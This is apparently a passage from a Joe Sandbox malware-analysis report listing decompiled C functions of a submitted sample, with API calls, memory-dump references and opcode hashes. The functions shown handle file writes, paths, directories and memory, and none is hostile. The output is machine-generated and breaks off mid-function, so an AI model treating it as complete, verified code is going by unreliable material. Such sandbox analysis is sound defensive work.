                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: 9bb8a60c650ce9cd92c6100b451656493633ae551ef47ddb992c74e63a1d34b8
                                                                                                                                                                                                      • Instruction ID: f52a5bbe5b1565d073ac248e8643576d5645f1fe97a0cad712c4c8ce9d2c00ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb8a60c650ce9cd92c6100b451656493633ae551ef47ddb992c74e63a1d34b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29014BA3E115B02AF364402A4C88FBB555CCB9AB34F1B0335BDAAFB1D2D5A85C0481E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0xe858c; // 0x268
                                                                                                                                                                                                      				_t9 = E000E3680(_t20);
                                                                                                                                                                                                      				if( *0xe91d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0xe8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0xe9400; // 0xab400
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0xe9400 = _t15;
                                                                                                                                                                                                      							if( *0xe8184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0xe8584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xe93f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x000e4ad5
                                                                                                                                                                                                      0x000e4adb
                                                                                                                                                                                                      0x000e4ae7
                                                                                                                                                                                                      0x000e4aee
                                                                                                                                                                                                      0x000e4b05
                                                                                                                                                                                                      0x000e4b0d
                                                                                                                                                                                                      0x000e4b14
                                                                                                                                                                                                      0x000e4b1a
                                                                                                                                                                                                      0x000e4b1c
                                                                                                                                                                                                      0x000e4b21
                                                                                                                                                                                                      0x000e4b2a
                                                                                                                                                                                                      0x000e4b2f
                                                                                                                                                                                                      0x000e4b31
                                                                                                                                                                                                      0x000e4b39
                                                                                                                                                                                                      0x000e4b54
                                                                                                                                                                                                      0x000e4b54
                                                                                                                                                                                                      0x000e4b39
                                                                                                                                                                                                      0x000e4b2f
                                                                                                                                                                                                      0x000e4b0f
                                                                                                                                                                                                      0x000e4b0f
                                                                                                                                                                                                      0x000e4b0f
                                                                                                                                                                                                      0x000e4b5e
                                                                                                                                                                                                      0x000e4ae9
                                                                                                                                                                                                      0x000e4aed
                                                                                                                                                                                                      0x000e4aed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000E369F
                                                                                                                                                                                                        • Part of subcall function 000E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36B2
                                                                                                                                                                                                        • Part of subcall function 000E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 000E4B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 1d54b938dd4c1f6d5786e104bd91d43cb1caa7d3ff0e0c3cdfbe6acea7dbd614
                                                                                                                                                                                                      • Instruction ID: 33843c226b6f1d93e7ccaca42b817e090e65a06f560f33a1faff8526652c3fe6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d54b938dd4c1f6d5786e104bd91d43cb1caa7d3ff0e0c3cdfbe6acea7dbd614
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C019271200281AFEB558F6ADC85BA6779AF744B25F048225F939BF1E0CB78D811CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0xe8b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0xe8b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E000E16B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x000e6592
                                                                                                                                                                                                      0x000e6594
                                                                                                                                                                                                      0x000e6596
                                                                                                                                                                                                      0x000e6598
                                                                                                                                                                                                      0x000e6598
                                                                                                                                                                                                      0x000e659b
                                                                                                                                                                                                      0x000e659b
                                                                                                                                                                                                      0x000e659d
                                                                                                                                                                                                      0x000e659e
                                                                                                                                                                                                      0x000e65a2
                                                                                                                                                                                                      0x000e65a4
                                                                                                                                                                                                      0x000e65a9
                                                                                                                                                                                                      0x000e65b2
                                                                                                                                                                                                      0x000e65b6
                                                                                                                                                                                                      0x000e65ba
                                                                                                                                                                                                      0x000e65c3
                                                                                                                                                                                                      0x000e65c5
                                                                                                                                                                                                      0x000e65c8
                                                                                                                                                                                                      0x000e65c8
                                                                                                                                                                                                      0x000e65c3
                                                                                                                                                                                                      0x000e65c9
                                                                                                                                                                                                      0x000e65cc
                                                                                                                                                                                                      0x000e65d2
                                                                                                                                                                                                      0x000e65d1
                                                                                                                                                                                                      0x000e65d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e65dc
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(000E8B3E,000E8B3F,00000001,000E8B3E,-00000003,?,000E60EC,000E1140,?), ref: 000E65BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: 6c9985212f76442f93cdbbde374d90eba04f688d67b36dbc08e76c34471bd020
                                                                                                                                                                                                      • Instruction ID: 3e2a36f3d9c7ea82a2d96c4ad886cf12f092b99713da03da426a63f70f147e38
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c9985212f76442f93cdbbde374d90eba04f688d67b36dbc08e76c34471bd020
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9F02D333046D09FD331051BA884BA7BFD99BA6390F14055AE8DAE3205CA675C4583A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                      					_t9 = E000E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x000e6229
                                                                                                                                                                                                      0x000e6230
                                                                                                                                                                                                      0x000e6247
                                                                                                                                                                                                      0x000e626a
                                                                                                                                                                                                      0x000e6272
                                                                                                                                                                                                      0x000e6249
                                                                                                                                                                                                      0x000e6255
                                                                                                                                                                                                      0x000e625f
                                                                                                                                                                                                      0x000e6264
                                                                                                                                                                                                      0x000e6264
                                                                                                                                                                                                      0x000e6284

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000E623F
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: 1a53c98101ec32b07208cb908feddeb192cf6aa630e762976682962f697e9fcb
                                                                                                                                                                                                      • Instruction ID: 33213194731c3ce1d02931e7c3e4c861c36079e16c0b4be2c03519d114f16d6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a53c98101ec32b07208cb908feddeb192cf6aa630e762976682962f697e9fcb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23F0B4B0700248AFE750EB759D42BFE36A8DB94740F40046AAA85FB193DD759D448650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0xe8d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xe8d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0xe8d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x000e4b66
                                                                                                                                                                                                      0x000e4b74
                                                                                                                                                                                                      0x000e4b98
                                                                                                                                                                                                      0x000e4ba0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4bac
                                                                                                                                                                                                      0x000e4ba4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4ba4
                                                                                                                                                                                                      0x000e4b78
                                                                                                                                                                                                      0x000e4b7e
                                                                                                                                                                                                      0x000e4b84
                                                                                                                                                                                                      0x000e4b8a
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,000E4FA1,00000000), ref: 000E4B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 026d5908cf8f7b13ec767de91e09d8fbf1b813935bd7bfb6b37a5981f41d6272
                                                                                                                                                                                                      • Instruction ID: ace4cd001c31c5243852d35efda179ca1595b056123bdd974cee844737777b9a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 026d5908cf8f7b13ec767de91e09d8fbf1b813935bd7bfb6b37a5981f41d6272
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F01231508B889E4771CF3ECC00692BBE4BBD53603108A2F956EF2190EB31A451EB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E66AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x000e66b1
                                                                                                                                                                                                      0x000e66ba
                                                                                                                                                                                                      0x000e66c7
                                                                                                                                                                                                      0x000e66bc
                                                                                                                                                                                                      0x000e66be
                                                                                                                                                                                                      0x000e66be

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,000E4777,?,000E4E38,?), ref: 000E66B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      • Opcode ID: 848f1f5aac81435ee63060b78b27d3dd1196bdae7d1669ca6e3f80d816cc168b
                                                                                                                                                                                                      • Instruction ID: 428587f60134b8fbd6d7ba516c4e768399c51fbf40e105190a09ab0cc902d35a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 848f1f5aac81435ee63060b78b27d3dd1196bdae7d1669ca6e3f80d816cc168b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83B09276232480466A6016327C695562881A7D273A7E52B91F032E01E0CA3EE946D004
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x000e4caa
                                                                                                                                                                                                      0x000e4cb1

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 000E4CAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                      • Opcode ID: 1e609b0c7b111e5d79b99a2831536f6f9280ec955bfd4f7737380501bbc20624
                                                                                                                                                                                                      • Instruction ID: a2ccb4bdee07b9b6d5ae66d4b362aa733e77f5f594c8167c5be5f4439d1a48bb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e609b0c7b111e5d79b99a2831536f6f9280ec955bfd4f7737380501bbc20624
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40B0123314424CB7DF001FC2EC09F853F1DE7C9B61F150000F60C490508A76A5108696
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x000e4cc8
                                                                                                                                                                                                      0x000e4ccf

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                      • Opcode ID: 79e4639f157db4b84f6f38c55032122a4bbb3eb2c4d1320ded1eece50f71dbec
                                                                                                                                                                                                      • Instruction ID: 7c92b129b3468c3ba01a43b1d02de30882c6c8244867eae0c369c24556f4105a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79e4639f157db4b84f6f38c55032122a4bbb3eb2c4d1320ded1eece50f71dbec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04B0123100014CB78F001B42EC088453F1DD7C57707000010F50C450218B3BA8118585
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E000E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
